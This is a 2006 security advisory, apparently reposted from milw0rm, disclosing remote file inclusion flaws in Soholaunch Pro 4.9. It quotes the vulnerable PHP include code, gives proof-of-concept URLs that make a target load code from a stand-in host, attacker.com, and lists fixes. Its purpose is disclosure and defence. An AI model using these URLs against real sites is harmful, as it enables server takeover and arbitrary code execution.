Docstoc

Soholaunch Pro 4.9 r36 Remote File Inclusion Vulnerabilities

Document Sample
Soholaunch Pro 4.9 r36 Remote File Inclusion Vulnerabilities Powered By Docstoc
					                        Soholaunch Pro 4.9 r36 Remote File Inclusion Vulnerabilities                              Page 1/2
  1    ____________________     ___ ___ ________
  2    \_   _____/\_    ___ \ /    |    \\_____ \
  3     |    __)_ /     \ \//      ~     \/   |   \
  4     |         \\     \___\     Y     /    |     \
  5    /_______ / \______ /\___|_ /\_______ /
  6            \/          \/        \/          \/                           .OR.ID
  7    ECHO_ADV_57$2006
  8
  9    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  10   [ECHO_ADV_57$2006]Soholaunch Pro <=4.9 r36 Multiple Remote File Inclusion Vulnerability
  11   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  12
  13   Author          : Dedi Dwianto a.k.a the_day
  14   Date Found      : October, 31th 2006
  15   Location        : Indonesia, Jakarta
  16   web             : http://advisories.echo.or.id/adv/adv57−theday−2006.txt
  17   Critical Lvl    : Highly critical
  18   Impact          : System access
  19   Where           : From Remote
  20   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  21
  22   Affected software description:
  23   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  24
  25   Application      : Soholaunch Pro Edition
  26   version          : <=4.9 r46
  27   URL              : http://www.soholaunch.com
  28
  29   Soholaunch Pro Edition is a software product that makes it easy for people of all experience levels to create
  30   and maintain a great website. It reins−in the hard parts of building a website and presents them a way that the
  31   non−geek can understand and control
  32   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  33
  34   Vulnerability:
  35   ~~~~~~~~~~~~~~
  36
  37   I found vulnerability in script shared_functions.php
  38   −−−−−−−−−−−−−−−−−−−−−−−−−−shared_functions.php−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  39   ....
  40   <?
  41   ...
  42   include_once($_SESSION[’docroot_path’]."/sohoadmin/includes/mysql_insert.class.php");
  43
  44   # userData manipulation class (works with misc_userdata table)
  45
  46   include_once($_SESSION[’docroot_path’]."/sohoadmin/includes/userdata.class.php");
  47
  48   ...
  49   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  50
  51   Input passed to the "$_SESSION[’docroot_path’]" parameter in shared_functions.php is not
  52   properly verified before being used. This can be exploited to execute
the_day                                                                                                            11/06/2006
                       Soholaunch Pro 4.9 r36 Remote File Inclusion Vulnerabilities                                Page 2/2
  53    arbitrary PHP code by including files from local or external
  54    resources.
  55
  56    Also affected files :
  57
  58    /client_files/shopping_cart/pgm−shopping_css.inc.php
  59    /program/includes/shared_functions.php
  60
  61
  62
  63    Proof Of Concept:
  64    ~~~~~~~~~~~~~~~
  65
  66    http://target.com/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://attacker.com/inject.t
        xt?
  67    http://target.com/sohoadmin/client_files/shopping_cart/pgm−shopping_css.inc.php?_SESSION[docroot_path]=http://attacke
        r.com/inject.txt?
  68
  69
  70    Solution:
  71    ~~~~~~~
  72
  73    − Sanitize variable $_SESSION[’docroot_path’] affected files.
  74    − Turn off register_globals
  75
  76    Timeline :
  77    ~~~~~~~~~
  78
  79    31 − 10 − 2006 bugs found
  80    31 − 10 − 2006 vendor contacted
  81    07 − 11 − 2006 public disclosure
  82
  83    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  84
  85    Shoutz:
  86    ~~~
  87    ~ y3dips,moby,comex,z3r0byt3,K−159,c−a−s−e,S‘to,lirva32,anonymous
  88    ~ Jessy My Brain
  89    ~ az001,bomm_3x,matdhule,angelia
  90    ~ newbie_hacker@yahoogroups.com
  91    ~ #aikmel − #e−c−h−o @irc.dal.net
  92    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  93    −−−
  94    Contact:
  95    ~~~~
  96         EcHo Research & Development Center
  97         the_day[at]echo[dot]or[dot]id
  98
  99    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− [ EOF ]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  100
  101   # milw0rm.com [2006−11−06]

the_day                                                                                                             11/06/2006

				
DOCUMENT INFO